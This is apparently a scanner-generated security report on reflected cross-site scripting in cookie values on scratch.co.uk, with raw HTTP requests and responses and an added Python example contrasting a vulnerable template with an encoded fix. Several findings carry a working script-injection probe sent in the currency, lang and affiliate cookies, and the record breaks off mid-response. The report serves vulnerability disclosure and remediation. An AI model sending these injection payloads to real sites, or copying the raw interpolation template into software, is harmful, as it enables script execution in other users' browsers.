3.164. http://scratch.co.uk/help/deposit/methods/ [currency cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/deposit/methods/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb9ed"><script>alert(1)</script>e3eb6fdaf26 was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/deposit/methods/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBPfb9ed"><script>alert(1)</script>e3eb6fdaf26;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:32 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:32 GMT; path=/
Set-Cookie: currency=GBPfb9ed%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee3eb6fdaf26; expires=Wed, 15-Jun-2011 12:30:32 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:32 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 18429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBPfb9ed"><script>alert(1)</script>e3eb6fdaf26', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.165. http://scratch.co.uk/help/deposit/methods/ [lang cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/deposit/methods/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2c6e"><script>alert(1)</script>f553ccebbf was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/deposit/methods/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENGa2c6e"><script>alert(1)</script>f553ccebbf; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:08 GMT; path=/
Set-Cookie: lang=ENGa2c6e%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef553ccebbf; expires=Wed, 15-Jun-2011 12:30:08 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:30:08 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:08 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 18534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENGa2c6e"><script>alert(1)</script>f553ccebbf', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.166. http://scratch.co.uk/help/fairplay/ [affiliate cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/fairplay/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c71b4"><script>alert(1)</script>7d02a9a5dda was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/fairplay/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243c71b4"><script>alert(1)</script>7d02a9a5dda; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243c71b4%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7d02a9a5dda; expires=Wed, 15-Jun-2011 12:25:50 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:50 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:50 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:50 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 12387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|243c71b4"><script>alert(1)</script>7d02a9a5dda');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...
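
The three cookie reflections on this host all share one sink: the cookie value lands in a single-quoted JavaScript string inside a javascript: URL inside a double-quoted href. The following Python is an added example, not code from scratch.co.uk or from the scanner; the server-side template is an assumption reconstructed from the rendered anchor in the response above (the original PHP is not shown), and the function names and cookie-format rules are hypothetical. It reproduces the observed anchor byte for byte, shows how a browser-style parse turns the "> into a second element, and renders the same values safely by JS-string-encoding for the inner context and then HTML-attribute-encoding for the outer one, checked by decoding the result the way a browser would. It also serves findings 3.167 through 3.179, which differ only in cookie name and path.

```python
"""Reflected XSS via cookie values in a javascript: href, and its fix.

Added example for this report; it is not code from scratch.co.uk or from the
scanner. The template below is an assumption reconstructed from the rendered
HTML in finding 3.166 (the original PHP is not shown); function names and
cookie-format rules are hypothetical.
"""
import html
import json
import re
from html.parser import HTMLParser

# Tainted affiliate cookie value from finding 3.166 (after the server
# URL-decoded the %7C separators).
MARKER = 'c71b4"><script>alert(1)</script>7d02a9a5dda'
PAYLOAD = 'direct-173|193|214|243' + MARKER

ONCLICK = 'onclick="pageTracker._trackEvent(\'Join\', \'Top Nav\');"'

# The anchor exactly as it appeared in the response body of finding 3.166.
OBSERVED = ('<a href="javascript:openScratch(\'GBP\', \'ENG\', '
            '\'' + PAYLOAD + '\');" ' + ONCLICK + '>')


def render_vulnerable(currency, lang, affiliate):
    """Assumed original template: cookie values dropped raw into single-quoted
    JS string literals inside a javascript: URL inside a double-quoted href."""
    return ('<a href="javascript:openScratch(\'%s\', \'%s\', \'%s\');" %s>'
            % (currency, lang, affiliate, ONCLICK))


def js_string(value):
    """JS string literal for value. json.dumps escapes quotes, backslashes and
    control characters; <, > and & are hex-escaped too, so the literal stays
    inert even if the surrounding HTML encoding is ever lost."""
    return (json.dumps(str(value))
            .replace('<', '\\u003c').replace('>', '\\u003e')
            .replace('&', '\\u0026'))


def render_fixed(currency, lang, affiliate):
    """Encode for the inner context (JS string) first, then for the outer
    context (HTML attribute); the browser undoes the layers in reverse."""
    call = 'openScratch(%s);' % ', '.join(
        js_string(v) for v in (currency, lang, affiliate))
    return '<a href="%s" %s>' % (html.escape('javascript:' + call, quote=True),
                                 ONCLICK)


class _Anchor(HTMLParser):
    """Collects start tags and the first href. HTMLParser entity-decodes
    attribute values, as a browser does."""
    def __init__(self):
        super().__init__()
        self.tags, self.href = [], None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == 'a' and self.href is None:
            self.href = dict(attrs).get('href')


def _parse(markup):
    p = _Anchor()
    p.feed(markup)
    p.close()
    return p


def injected_tags(markup):
    """Elements other than the intended <a>; non-empty means the cookie
    value broke out of the attribute into markup."""
    return [t for t in _parse(markup).tags if t != 'a']


def decoded_args(markup):
    """Arguments openScratch() would actually receive: entity-decode the href
    (parser), then decode the JS string literals (JSON is a subset here).
    Returns None when the call itself has been destroyed."""
    m = re.fullmatch(r'javascript:openScratch\((.*)\);', _parse(markup).href or '')
    return json.loads('[' + m.group(1) + ']') if m else None


def reflected_unencoded(body, marker):
    """The scanner's own check: the raw probe appears verbatim in the body."""
    return marker in body


# Second line of defence: the three cookies only ever carry a few shapes
# (assumed from the values seen in the report); reject anything else before
# it reaches a template.
COOKIE_RULES = {
    'lang': re.compile(r'[A-Z]{3}'),
    'currency': re.compile(r'[A-Z]{3}'),
    'affiliate': re.compile(r'[a-z]+-\d+(\|\d+)*'),
}


def cookie_is_wellformed(name, value):
    rule = COOKIE_RULES.get(name)
    return bool(rule and rule.fullmatch(value))


if __name__ == '__main__':
    print(injected_tags(render_vulnerable('GBP', 'ENG', PAYLOAD)))  # ['script']
    print(injected_tags(render_fixed('GBP', 'ENG', PAYLOAD)))       # []
    print(decoded_args(render_fixed('GBP', 'ENG', PAYLOAD)))
```

Run it directly to see the two parses side by side. The allow-list is the cheaper fix for this site, because lang and currency are three-letter codes and affiliate is a dash-and-pipe-separated numeric list, but the template is the actual bug, so the layered output encoding in render_fixed is still required wherever a cookie value is written into a page.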

3.167. http://scratch.co.uk/help/fairplay/ [currency cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/fairplay/

Issue detail

The value of the currency cookie is copied into a JavaScript string literal inside the javascript: URL of a double-quoted href attribute. The payload d8329"><script>alert(1)</script>563c2da48f5 was submitted in the currency cookie and was echoed unmodified in the application's response; the leading "> closes the attribute and the <a> tag, so the <script> element that follows is parsed as markup.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the tainted data arrives in a cookie, this is not trivial to exploit against another user: an attacker first needs a way to set an arbitrary cookie value in the victim's browser, which considerably mitigates the impact. The response does, however, re-issue the tainted currency value in a Set-Cookie header with a 30-day expiry, so a planted payload persists across later visits.

Request

GET /help/fairplay/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBPd8329"><script>alert(1)</script>563c2da48f5;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:10 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:10 GMT; path=/
Set-Cookie: currency=GBPd8329%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E563c2da48f5; expires=Wed, 15-Jun-2011 12:30:10 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:10 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 12278

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBPd8329"><script>alert(1)</script>563c2da48f5', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.168. http://scratch.co.uk/help/fairplay/ [lang cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/fairplay/

Issue detail

The value of the lang cookie is copied into a JavaScript string literal inside the javascript: URL of a double-quoted href attribute. The payload 29be1"><script>alert(1)</script>140ac1fb98e was submitted in the lang cookie and was echoed unmodified in the application's response; the leading "> closes the attribute and the <a> tag, so the <script> element that follows is parsed as markup.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the tainted data arrives in a cookie, this is not trivial to exploit against another user: an attacker first needs a way to set an arbitrary cookie value in the victim's browser, which considerably mitigates the impact. The response does, however, re-issue the tainted lang value in a Set-Cookie header with a 30-day expiry, so a planted payload persists across later visits.

Request

GET /help/fairplay/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG29be1"><script>alert(1)</script>140ac1fb98e; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:24 GMT; path=/
Set-Cookie: lang=ENG29be1%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E140ac1fb98e; expires=Wed, 15-Jun-2011 12:29:24 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:24 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:24 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 12387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG29be1"><script>alert(1)</script>140ac1fb98e', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.169. http://scratch.co.uk/help/privacy/ [affiliate cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/privacy/

Issue detail

The value of the affiliate cookie is copied into a JavaScript string literal inside the javascript: URL of a double-quoted href attribute. The payload 34a13"><script>alert(1)</script>461aa39c4c8 was submitted in the affiliate cookie and was echoed unmodified in the application's response (only the %7C separators were URL-decoded); the leading "> closes the attribute and the <a> tag, so the <script> element that follows is parsed as markup.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the tainted data arrives in a cookie, this is not trivial to exploit against another user: an attacker first needs a way to set an arbitrary cookie value in the victim's browser, which considerably mitigates the impact. The response does, however, re-issue the tainted affiliate value in a Set-Cookie header with a 30-day expiry, so a planted payload persists across later visits.

Request

GET /help/privacy/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C24334a13"><script>alert(1)</script>461aa39c4c8; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C24334a13%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E461aa39c4c8; expires=Wed, 15-Jun-2011 12:25:57 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:57 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:57 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:57 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 17257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|24334a13"><script>alert(1)</script>461aa39c4c8');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.170. http://scratch.co.uk/help/privacy/ [currency cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/privacy/

Issue detail

The value of the currency cookie is copied into a JavaScript string literal inside the javascript: URL of a double-quoted href attribute. The payload ff73f"><script>alert(1)</script>74d5790b1ac was submitted in the currency cookie and was echoed unmodified in the application's response; the leading "> closes the attribute and the <a> tag, so the <script> element that follows is parsed as markup.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the tainted data arrives in a cookie, this is not trivial to exploit against another user: an attacker first needs a way to set an arbitrary cookie value in the victim's browser, which considerably mitigates the impact. The response does, however, re-issue the tainted currency value in a Set-Cookie header with a 30-day expiry, so a planted payload persists across later visits.

Request

GET /help/privacy/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBPff73f"><script>alert(1)</script>74d5790b1ac;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:35 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:35 GMT; path=/
Set-Cookie: currency=GBPff73f%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E74d5790b1ac; expires=Wed, 15-Jun-2011 12:30:35 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:35 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 17101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBPff73f"><script>alert(1)</script>74d5790b1ac', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.171. http://scratch.co.uk/help/privacy/ [lang cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/privacy/

Issue detail

The value of the lang cookie is copied into a JavaScript string literal inside the javascript: URL of a double-quoted href attribute. The payload 88308"><script>alert(1)</script>3161139aaf8 was submitted in the lang cookie and was echoed unmodified in the application's response; the leading "> closes the attribute and the <a> tag, so the <script> element that follows is parsed as markup.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the tainted data arrives in a cookie, this is not trivial to exploit against another user: an attacker first needs a way to set an arbitrary cookie value in the victim's browser, which considerably mitigates the impact. The response does, however, re-issue the tainted lang value in a Set-Cookie header with a 30-day expiry, so a planted payload persists across later visits.

Request

GET /help/privacy/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG88308"><script>alert(1)</script>3161139aaf8; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:36 GMT; path=/
Set-Cookie: lang=ENG88308%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3161139aaf8; expires=Wed, 15-Jun-2011 12:29:36 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:36 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:36 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 16996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG88308"><script>alert(1)</script>3161139aaf8', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.172. http://scratch.co.uk/invite-friend/ [affiliate cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /invite-friend/

Issue detail

The value of the affiliate cookie is copied into a JavaScript string literal inside the javascript: URL of a double-quoted href attribute. The payload 7cef2"><script>alert(1)</script>2ddcfdeb17b was submitted in the affiliate cookie and was echoed unmodified in the application's response (only the %7C separators were URL-decoded); the leading "> closes the attribute and the <a> tag, so the <script> element that follows is parsed as markup.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the tainted data arrives in a cookie, this is not trivial to exploit against another user: an attacker first needs a way to set an arbitrary cookie value in the victim's browser, which considerably mitigates the impact. The response does, however, re-issue the tainted affiliate value in a Set-Cookie header with a 30-day expiry, so a planted payload persists across later visits.

Request

GET /invite-friend/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C2437cef2"><script>alert(1)</script>2ddcfdeb17b; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C2437cef2%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2ddcfdeb17b; expires=Wed, 15-Jun-2011 12:25:37 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:37 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:37 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:37 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 15141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|2437cef2"><script>alert(1)</script>2ddcfdeb17b');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.173. http://scratch.co.uk/invite-friend/ [currency cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /invite-friend/

Issue detail

The value of the currency cookie is copied into a JavaScript string literal inside the javascript: URL of a double-quoted href attribute. The payload d0b24"><script>alert(1)</script>331cb5603ba was submitted in the currency cookie and was echoed unmodified in the application's response; the leading "> closes the attribute and the <a> tag, so the <script> element that follows is parsed as markup.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the tainted data arrives in a cookie, this is not trivial to exploit against another user: an attacker first needs a way to set an arbitrary cookie value in the victim's browser, which considerably mitigates the impact. The response does, however, re-issue the tainted currency value in a Set-Cookie header with a 30-day expiry, so a planted payload persists across later visits.

Request

GET /invite-friend/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBPd0b24"><script>alert(1)</script>331cb5603ba;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
